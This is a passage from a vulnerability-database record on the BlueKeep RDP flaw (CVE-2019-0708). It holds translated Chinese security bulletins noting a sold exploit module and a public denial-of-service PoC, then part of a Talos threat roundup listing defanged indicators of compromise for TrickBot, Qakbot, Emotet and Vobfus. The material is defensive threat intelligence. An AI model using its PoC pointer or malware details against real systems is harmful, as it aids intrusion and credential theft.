[](/Article/UploadPic/2019-7/201972616548518.jpg) \nhttps://www.immunityinc.com/products/canvas/ \nBefore Immunity's BlueKeep exploit module leaks, companies and users still have time to patch their systems. \nAs is well known, BlueKeep affects Windows XP, Windows Vista, Windows 7, Windows Server 2003 and Windows Server 2008. \nFor system patches, mitigations and workarounds, see here: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nWindows 10 is not affected. \n\n", "edition": 1, "modified": "2019-07-26T00:00:00", "published": "2019-07-26T00:00:00", "id": "MYHACK58:62201995234", "href": "http://www.myhack58.com/Article/html/3/62/2019/95234.htm", "title": "Began openly selling a...the United States company is selling weapons of the BlueKeep the exploit-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-03T09:28:02", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "![](/Article/UploadPic/2019-6/20196312454415.png) \n\n\n0x00 Description \nOn May 31, 2019, 360 detected that someone had posted PoC code on GitHub that causes a remote denial of service (https://github.com/n1xbyte/CVE-2019-0708), together with a demo video against Windows Server 2008 R2 x64; the PoC code has been verified to be real and effective. An attacker could use the code as it spreads to launch remote denial-of-service attacks against systems, or modify it to achieve remote code execution. \n![](/Article/UploadPic/2019-6/20196312456581.png) \n\n0x01 Security recommendations \n1. Install the 360 Security Guard one-click update. \n2. Avoid exposing Remote Desktop Services (RDP, default port 3389) to the public internet; where opening it is genuinely necessary for remote operations and maintenance, access it through a VPN, and close 445, 139, 135 and other unnecessary ports. \n3. 
Use the 360 RDP remote vulnerability non-destructive detection tool (https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip) to scan machines on internal and external networks, find vulnerable machines and fix them. For machines that temporarily cannot be connected to the network, use the 360 offline immunization tool (http://dl.360safe.com/leakfixer/360SysVulTerminator_CVE-2019-0708.exe) to detect and fix the vulnerability. \n\n", "edition": 1, "modified": "2019-06-03T00:00:00", "published": "2019-06-03T00:00:00", "id": "MYHACK58:62201994388", "href": "http://www.myhack58.com/Article/html/3/62/2019/94388.htm", "title": "Alert Windows RDP remote vulnerability POC propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-10-11T17:29:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 4 and Oct. 11. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. 
For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5da097d613262.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.TrickBot-7288419-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7287972-0 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Trojan.Emotet-7287811-0 | Trojan | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7198158-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. 
\nWin.Dropper.Upatre-7196259-0 | Dropper | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.TrickBot-7288419-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 64 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]152[.]4[.]210` | 17 \n`37[.]228[.]117[.]146` | 9 \n`31[.]184[.]253[.]37` | 9 \n`181[.]113[.]20[.]186` | 6 \n`185[.]222[.]202[.]222` | 6 \n`51[.]68[.]247[.]62` | 5 \n`194[.]5[.]250[.]82` | 5 \n`51[.]254[.]69[.]244` | 5 \n`91[.]132[.]139[.]170` | 5 \n`116[.]203[.]16[.]95` | 4 \n`189[.]80[.]134[.]122` | 4 \n`203[.]23[.]128[.]168` | 4 \n`46[.]30[.]41[.]229` | 4 \n`37[.]44[.]212[.]216` | 4 \n`216[.]239[.]38[.]21` | 3 \n`185[.]248[.]87[.]88` | 3 \n`138[.]59[.]233[.]5` | 3 \n`190[.]154[.]203[.]218` | 3 \n`187[.]58[.]56[.]26` | 3 \n`177[.]103[.]240[.]149` | 3 \n`200[.]21[.]51[.]38` | 3 \n`5[.]230[.]22[.]40` | 3 \n`200[.]153[.]15[.]178` | 3 \n`198[.]27[.]74[.]146` | 2 \n`146[.]196[.]122[.]167` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 12 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 3 \n`ipinfo[.]io` | 3 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`api[.]ipify[.]org` | 2 \n`www[.]myexternalip[.]com` | 1 \n`ident[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\netcloud` | 64 \n`%System32%\\Tasks\\netcloud free disk` | 64 \n`%APPDATA%\\netcloud\\settings.ini` | 64 \n`%APPDATA%\\netcloud\\data\\systeminfo64` | 4 \n`%APPDATA%\\netcloud\\data\\pwgrab64` | 2 \n`%APPDATA%\\netcloud\\data\\pwgrab64_configs\\dpost` | 2 \n \n#### File Hashes\n\n` 01665c3044d0c07559850f4c63b0e83a75d377d47cbb024109af959ab07a84ab 029d508d8b0b8d85d4e9409b4fce7d1e77278e9c287ea413bfc6ef74b04f3f62 02b56e22b5b87c10e1aaa55a64d023c146705bec60a05f663383c58ad2d46ec9 04915554da413b0eec1c972c40dd73f01494e0babbb952511bc471831f09d66a 07037779cf0fd1203023ab1c5d0ca29103ec20b86ef4a1352e0eae887522aaf5 0b0812b19376da99480f2eaa6ef5c50b0ddef28e861d58f72ea2f321d8d5f4a7 11b52fd22db6a8407a7b185bbff4731813f3e5ade255545b0c5aa75e71001d40 139682b035166c0554038c7a3d41d21c1224ca4d8a1f3dc2fdc78b5d162980a3 1452da4d87422fbce37fa81c0357b9093120f39849a39a6b49529d2e88c24601 15e767c8416fff66195618b591a2a2869b42075a81962d760e644504ecbccd7d 1bcc2e0e40cb671020249c818d9580345498198e06e83242ec54c5666c13eeac 1f64de67c63364947a52b85977c30e101cb27151c9d21759db0a7ea2d20d1c76 1fd9de5a0da8baf970b071eec8072dbe8e166c52a520252a7bad4c6cccdb6f5a 2211518528d8df3b3a37b83807f27b3c48e8dc68e427be3d693775dd9281d3dc 2329e7a18e95750266b5865d2cebb2b0ab2db296e99735b1fcf174eabd0364bc 25ed6d3f3dcaa2fb50d9b98b4b18ce5552b8e7f7edb34036dbe223a0e594c61e 28d5358cee665b777f608ab2994f09baeea9f98a53f7631dc18412b58e279e79 2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7 2cb27358ab67c8b99b3ef38653c6e529daf2782415ee4025977853dbecba4135 2fcd6ec5753d814c537cf1d8c0bd40fd71da35fc0daa3464c71061feabccc003 
3899c0d52fb831b58971b8cc3676b819623c3cdf394404441e9e3fc5149f2924 39812d745606743e797291736409505e7c8fee6708f1b9cdfd81db696b045f0b 3c0fdeaf8672109d78f05a5409aa4d1a64970e0317d00dce93c2f850ed315444 3ce742d661cf7896361b4419bffe4b457db5996bb437e386ac8725a32ea3775c 3cfd3b1da2d19d3d79479a35570aa2f8c53c5a865307ae39c45dbab34ecd1eb3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JTRDz8oSW50/XaCYva53LiI/AAAAAAAACwA/280I47e6txEPYBLQPdpqONY_nKCkzbvWQCLcBGAsYHQ/s1600/2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KJVTe4bprVI/XaCYzw4H7VI/AAAAAAAACwE/MpNwJCdyIWExayqR9lJI-HVKguGjEsqQACLcBGAsYHQ/s1600/815ba51dcf704f5d77d74f409b6ad6b8196c3f98f51a1f300e9e156597040a1a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Qakbot-7287972-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 9 \n`<random, matching [a-fA-F0-9]{10}>` | 6 \n`NO_HIDE` | 2 \n`Global\\eqfik` | 1 \n`Global\\epieuxzk` | 1 \n`Global\\ulnahjoi` | 1 \n`Global\\utjvfi` | 1 \n`Global\\siexlcvo` | 1 \n`Global\\3e356201-e784-11e9-a007-00501e3ae7b5` | 1 \n`9a1e0bdf466b43e51e62125b6de07886\u00d0\u00f7# Administra` | 1 \n`Global\\zmzqw` | 1 \n`Global\\hzquyt` | 1 \n`Global\\orprmhqn` | 1 \n`llvmspnzmgf` | 1 \n`Global\\emiudb` | 1 \n`siexlcvo/W` | 1 \n`Global\\okqxsvm` | 1 \n`hnqgbtxnpbgb` | 1 \n`Global\\awfury` | 1 \n`Global\\mesgra` | 1 \n`Global\\esute` | 1 \n`Global\\caypop` | 1 \n`azvfitrmerda` | 1 \n`Global\\yweieuzg` | 1 \n`Global\\lajpa` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]241[.]80[.]162` | 8 \n`69[.]241[.]74[.]170` | 8 \n`69[.]241[.]108[.]58` | 8 \n`69[.]241[.]106[.]102` | 8 \n`209[.]126[.]124[.]173` | 7 \n`66[.]96[.]134[.]31` | 6 \n`66[.]7[.]210[.]190` | 6 \n`65[.]182[.]187[.]52` | 6 \n`181[.]224[.]138[.]240` | 5 \n`69[.]64[.]56[.]244` | 5 \n`162[.]144[.]12[.]241` | 5 \n`208[.]100[.]26[.]234` | 3 \n`64[.]34[.]169[.]244` | 3 \n`108[.]61[.]103[.]175` | 3 \n`193[.]28[.]179[.]105` | 3 \n`12[.]167[.]151[.]78/31` | 3 \n`216[.]58[.]217[.]142` | 2 \n`195[.]22[.]28[.]222` | 2 \n`173[.]227[.]247[.]50` | 2 \n`12[.]167[.]151[.]89` | 2 \n`12[.]167[.]151[.]81` | 2 \n`195[.]22[.]28[.]199` | 1 \n`173[.]227[.]247[.]49` | 1 \n`173[.]227[.]247[.]34` | 1 \n`173[.]227[.]247[.]59` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jacksonville-a[.]speedtest[.]comcast[.]net` | 8 \n`stc-sjos-01[.]sys[.]comcast[.]net` | 8 \n`stc-fxbo-01[.]sys[.]comcast[.]net` | 8 \n`www[.]ip-adress[.]com` | 8 \n`stc-hstn-03[.]sys[.]comcast[.]net` | 8 \n`boston[.]speedtest[.]comcast[.]net` | 8 \n`houston[.]speedtest[.]comcast[.]net` | 8 \n`sanjose[.]speedtest[.]comcast[.]net` | 8 \n`jacksonville[.]speedtest[.]comcast[.]net` | 8 \n`wpaoyqevfvmqquvpfwo[.]com` | 3 \n`ageanrzekiycakzrswcq[.]com` | 3 \n`utglavlafksmzfcniumfwwbm[.]biz` | 3 \n`wyrlmssiybtkxemblgkturpw[.]net` | 3 \n`qguuivkqppwohlzzvjv[.]org` | 3 \n`ohfckvgylddiulbtgcrdijtpl[.]org` | 3 \n`zhkclrrbgufzsgljzohs[.]com` | 3 \n`evvedpvqyno[.]net` | 3 \n`cyiynudufvqmswxgtdkgyal[.]org` | 3 \n`fmncuwynktocekwqmthsr[.]net` | 3 \n`hrmmnxigwodcsbqhcezedv[.]net` | 3 \n`ohnzjsjoyxmkfpafaouujked[.]biz` | 3 \n`rpagfveavil[.]com` | 3 \n`ocqfamsdr[.]org` | 3 \n`sso[.]anbtr[.]com` | 2 \n`tnqnpjthcwhhit[.]biz` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcv.dll` | 1 
\n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfi.dll` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfik.exe` | 1 \n`%HOMEPATH%\\APPLIC~1\\AuthHost_86.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\cemiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiud.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\qaodxae.exe` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\csiexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\u\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypo.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\ccaypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\cnkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nksw.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh.exe` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\cteubkc32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\ojpgopoc.exe` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\teubk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00ff1db58b6f1e59ab2c2bf8e56160505a45d4a81f6fe1eaa929e64fb1721579 064778a5c62de64d9209efd2a1d07d51e5bba27dec7304adb16cb0f477990da7 10498726da41ce76941828ba2645cd142d14345730ed27ef477ef3360776b70e 1550ddeb6bedfa869544e6acff1b99deef5ed36c5d3e53bb8c54a7dfc1ee7979 16e32d59b24b270c97fc9003ce99d52bbd5d2f8f71066a7ae89489b70230b6ea 2a4d5212548373f2036751006f472fd59796cb1f3ea0a5e3b00ff257dda42d90 2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164 2f8eaa9d09eea245e077d855496d325833f431c565b0caf376694a20786a360d 33e8352baa3fd5c8657f950f6853c852ab5bc7a8738ef0100393e8840170f689 3c671a2c98bad1d21523542d92d3e7e64f10dc11b71ad877a12d3c716f79d6c5 3ed342a425980d09017f40042c3bc38c995f80b25ebc0ce54f57aa247a399972 
433da825e9d75917a8e935ce67e352de3300c2276b8e1e4088ad353f1dc563cd 4567101b5264de0d437095f3dad638f1f663eca77eb737f1c8188133786c42a3 49a262416b8af5718487c966f6d328f12b7dd39c4e48c1d12ec99eb6f67b5bf7 5008602076bc658f669bcbdcdcdae8ac0db03df3d67d59cc8a594916c7e0eab7 546fe2283bec932d0e579545928b7c61aa4865891ae2ae270311cb43d37f24fc 5694eba592c8d2dc736d820dfe10f1cb70fc613595349358e67651b04f8d5f9c 5873b0a3726c51faf9e15170f2cc2cf907da40bd6535886c2f4cc5eb4d1b677f 5a779b62299bf87288404f408ffd1ca26ffb365a1a80a3f0be02634dbb6b0acd 61e897720193eb60766425f7952795081b220bd3fcb84693d127ae08cdc7fd77 64a7ea2afabd89b89154b3e9165e4821194657eaa2df6f3c05513ac57f4269a1 67d275ebe2e3e3653d1a9dfc9e68abe38adaca68e30d4335e974fe9393ed1166 7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3 7173180702f16103ff9e12dc30a4d35ffe8e59fed07a9b85b1a8051cccc3443c 75294d7224051e0fc6f7a583941ed6be64270f2296f01a2f907c475bcc604296 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-diOr4nVxLus/XaCZODwtgoI/AAAAAAAACwI/i6MnwDpChPAzELBy_c8prmEqG8io00PAQCLcBGAsYHQ/s1600/7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vIPJRGd5KIc/XaCZdiQvCUI/AAAAAAAACwQ/8yuvzeDBGn4bdI32E86fo_L7eHsk104QgCLcBGAsYHQ/s1600/9a1e0bdf466b43e51e62125b6de07886d5cad816c12362db837d9496d9ee3afa_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gRpByRbRd6k/XaCZlQKaDSI/AAAAAAAACwY/MT_B_Pq7tIYRN7X8Fj4OJ1fKopA1yoXMQCLcBGAsYHQ/s1600/2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Emotet-7287811-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ObjectName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Description ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL ` | 13 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\M3C28B0E4` | 13 \n`Global\\I3C28B0E4` | 13 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]11[.]163[.]139` | 11 \n`85[.]54[.]169[.]141` | 10 \n`185[.]14[.]187[.]201` | 4 \n`45[.]79[.]188[.]67` | 4 \n`63[.]142[.]253[.]122` | 4 \n`67[.]225[.]229[.]55` | 3 \n`193[.]70[.]18[.]144` | 2 \n`193[.]252[.]22[.]86` | 2 \n`17[.]36[.]205[.]74` | 2 \n`212[.]227[.]15[.]142` | 2 \n`213[.]180[.]147[.]145` | 2 \n`52[.]96[.]40[.]242` | 2 \n`62[.]149[.]157[.]55` | 2 \n`217[.]116[.]0[.]228` | 2 \n`62[.]149[.]128[.]179` | 2 \n`173[.]194[.]68[.]108/31` | 2 \n`82[.]223[.]190[.]138/31` | 2 \n`62[.]28[.]40[.]155` | 1 \n`82[.]223[.]191[.]228` | 1 \n`84[.]232[.]4[.]63` | 1 \n`5[.]56[.]56[.]146` | 1 \n`37[.]187[.]56[.]166` | 1 \n`134[.]0[.]12[.]48` | 1 \n`213[.]0[.]77[.]51` | 1 \n`208[.]91[.]198[.]107` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]office365[.]com` | 2 \n`smtp[.]outlook[.]com` | 2 \n`smtp[.]1and1[.]es` | 2 \n`mail[.]comcast[.]net` | 2 \n`mail[.]1und1[.]de` | 2 \n`outlook[.]office365[.]com` | 2 \n`smtp[.]one[.]com` | 2 \n`smtp[.]orange[.]fr` | 2 \n`smtp[.]serviciodecorreo[.]es` | 2 \n`mail[.]gmx[.]net` | 2 \n`smtp[.]poczta[.]onet[.]pl` | 2 \n`mail[.]aruba[.]it` | 2 \n`pop3s[.]aruba[.]it` | 2 \n`smtp[.]pec[.]aruba[.]it` | 2 \n`smtp[.]myfbmc[.]com` | 1 \n`mail[.]amazon[.]com` | 1 \n`smtp[.]amazon[.]com` | 1 \n`mail[.]bellnet[.]ca` | 1 \n`mail[.]hotmail[.]es` | 1 \n`smtp[.]ogicom[.]pl` | 1 \n`smtp[.]my[.]tnt[.]com` | 1 \n`mail[.]pec[.]it` | 1 \n`mail[.]kovalam[.]es` | 1 \n`smtp[.]myslide[.]cn` | 1 \n`smtp[.]tepore[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 12 \n`\\TEMP\\yc3qjv_812.exe` | 1 \n`\\TEMP\\njrfqcj58z_23190.exe` | 1 \n`\\TEMP\\b2_13022603.exe` | 1 \n`\\TEMP\\5tnlmwuu_6728847347.exe` | 1 \n`\\TEMP\\feqxn9l_08751690.exe` | 1 \n`\\TEMP\\u1p1rr_2846411837.exe` | 1 \n`\\TEMP\\93cumzh_740237.exe` | 1 \n`%SystemRoot%\\TEMP\\DFFB.tmp` | 1 \n \n#### File Hashes\n\n` 0d2fcaa55a4fa60ddb207a884d8708616afe216172606cb34428696d94d02b55 1d79c23865675ea988e8da616d87729fc029e3da8655a452ec8603c2645ed29c 1eda8a1b220b335de0e0dcc4b1c370f063d3bb8179e78e1aa5aa07d97182e50e 2f2fde0c36731205d5c8139450b3e65c99c4b101632f9e5b359d241bd39bc854 4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290 6e0ff7d8aabe7604957239a4217e8acd18261216c6fd4447c3e3ea061062bad5 7999aecb854548554573e807e3099b3285ffa31244668bda61a60ca02763de48 c2b0637eaa88c02f22d551ece7de3220d4888a7882676fd7b51c6c577140ce51 ce8949e5a1b41b1b1ff2d6d432aef7af6db3c4308b4e58839b9e6958846cd24e d5128c8528eaf67f71aa26c53db2b9035ee95849f03ab991ae9805bf4c07f496 e142a57f84461cad1faea965d00decb6ed53eb65fc884acd52ffede5454d1a4e 
e28a38d8fdd96021b0391fc8a2f0e88da19143a6084ab6a64ff93fdb1d2c9ee2 fe84dbdcefa7c810abd780e0ca47c5bdfaa8c27146b810e2d784d1b00a077aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-SRQWZZjN7x4/XaCar6FuH3I/AAAAAAAACwo/0VchjmmiZgE-w8OUhfDzDKGUXKCyfxNAACLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IBunbnm_ww4/XaCavKiuXiI/AAAAAAAACws/6ZkBDPWOzwIgP0dPFndg_9aH0wWd4sqggCLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_tg.png>)\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7198158-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xaawee ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juemauy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zltip ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wkxid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: leohuow ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kuoova ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vjdoq ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beyuk ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baeuqo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lieagu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue 
Name: juohoah ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: taeele ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baaqaic ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wmquoz ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qeodux ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ziiluet ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mrlot ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: coawi ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ceqav ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: gejay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baule ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xeezua ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mouzui ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 23 \n`Global\\d11cb3c1-e7ca-11e9-a007-00501e3ae7b5` | 1 \n`Global\\02adca01-e7cb-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. 
